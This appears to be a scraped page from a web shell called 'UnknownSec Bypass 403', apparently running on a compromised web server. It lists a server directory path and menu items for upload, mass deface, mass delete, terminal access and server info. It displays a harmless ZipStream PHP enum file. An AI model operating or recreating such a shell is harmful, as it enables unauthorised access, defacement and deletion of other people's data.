UnknownSec Bypass
403
:
/
var
/
www
/
cotutilitydash
/
vendorexcel
/
maennchen
/
zipstream-php
/
src
/
Option
/ [
drwxrwxr-x
]
Menu
Upload
Mass depes
Mass delete
Terminal
Info server
About
name :
Method.php
<?php declare(strict_types=1); namespace ZipStream\Option; use MyCLabs\Enum\Enum; /** * Methods enum * * @method static STORE(): Method * @method static DEFLATE(): Method * @psalm-immutable */ class Method extends Enum { public const STORE = 0x00; public const DEFLATE = 0x08; }
Copyright © 2025 - UnknownSec